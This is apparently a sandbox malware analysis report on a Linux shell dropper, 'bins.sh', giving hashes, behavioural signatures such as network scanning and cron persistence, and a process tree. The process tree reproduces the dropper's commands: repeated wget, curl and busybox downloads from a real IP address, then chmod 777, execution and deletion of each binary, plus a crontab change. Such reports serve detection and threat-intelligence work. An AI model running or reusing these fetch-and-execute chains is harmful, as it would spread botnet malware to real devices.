Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
04-11-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
a0dad1a573f72a6534abb219fcb609c3
-
SHA1
140b3643fa1f39b4149ba4ecf7b68c13e59fad26
-
SHA256
79055bdb682b5b7fc371766063624ec6392ac3d09f2e698e07af4cf6cc6efa3a
-
SHA512
736c9b38ddeedc4ad6791d7a4cbcb0c965a04cfefdd19cf1c6efe08fa3a8cd880a18b7b0300a919879507ccac630c74b5f2c2ecb3446b776592495dd0a703401
-
SSDEEP
192:1amOZ5azCQNhdT4EnSEnSEnkEnsQEnrEnNtV92ypQbaEnSEnSEnkEnsQEnrEnFtg:1amOZ5azCQRx331CWZQbP331CW9hamOd
Malware Config
Signatures
-
Contacts a large (2102) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid Process 1581 chmod 1588 chmod 1560 chmod 1567 chmod 1574 chmod -
Executes dropped EXE 5 IoCs
Processes:
rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6YtczVWka3o8UvvUPrq8vvbSKgmuslpFilShkqdhfjalFn2FPsMu0xgrj6yZiDLil7A9RanbWM6meLoue2laMlH2B1O1qbD4Ssl61QdEwlMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZBioc pid Process /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt 1561 rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk 1568 czVWka3o8UvvUPrq8vvbSKgmuslpFilShk /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran 1575 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw 1582 bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB 1589 lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB -
Renames itself 1 IoCs
Processes:
lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZBpid Process 1590 lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.2p6Zvk crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZBdescription ioc Process File opened for reading /proc/576/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1188/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1691/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1727/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1777/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/648/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1086/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1331/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1655/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1769/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1784/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1625/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1637/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/159/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/461/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/615/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1043/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1122/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1606/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1671/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1693/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1695/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1781/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1785/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/22/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/178/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/462/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1076/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1599/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1711/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/172/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1619/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1620/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1743/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1776/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/28/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/85/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1713/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/5/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/168/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1190/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1262/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1613/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1614/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1729/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1750/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/14/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/29/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/173/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/248/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1350/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1708/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1783/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1802/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1805/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1770/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1809/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/21/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1171/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1275/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1651/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1720/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1756/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB File opened for reading /proc/1696/cmdline lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurlwgetwgetcurlbusyboxwgetcurlcurlcurlbusyboxbusyboxbusyboxwgetdescription ioc Process File opened for modification /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB busybox File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt wget File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk curl File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran wget File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk wget File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran curl File opened for modification /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw busybox File opened for modification /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw wget File opened for modification /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw curl File opened for modification /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB curl File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt curl File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt busybox File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk busybox File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran busybox File opened for modification /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1552
-
/bin/rm/bin/rm bins.sh2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Writes file to tmp directory
PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/chmodchmod 777 rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt./rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵PID:1563
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Writes file to tmp directory
PID:1564
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/chmodchmod 777 czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk./czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵PID:1570
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Writes file to tmp directory
PID:1571
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/chmodchmod 777 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran./qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵
- Writes file to tmp directory
PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod 777 bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw./bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵
- Writes file to tmp directory
PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/chmodchmod 777 lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB./lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1589 -
/bin/shsh -c "crontab -l"3⤵PID:1591
-
/usr/bin/crontabcrontab -l4⤵PID:1592
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1593
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1594
-
-
-
-
/bin/rmrm lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB2⤵PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZSJgcV0iwJrTDvpVbq9NOM46Nvt9yLVqvI2⤵PID:1599
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
210B
MD59b6f0e393ef873fc675437738feed5b1
SHA1506a676c1ee19e11a7a2b84027815b559d58012c
SHA256cdb301225add3c58e6e353d1a44a85cdbbbb2029fe84aa0fe319a605dae98057
SHA5127da81de54a75dc363b428e165c2f320cbae7a8dd58ee5ed205c84f5722a51066bd3f8698d3c1142ca85ccca6171d482f11c758b96b4ead60fae144d6eb86607f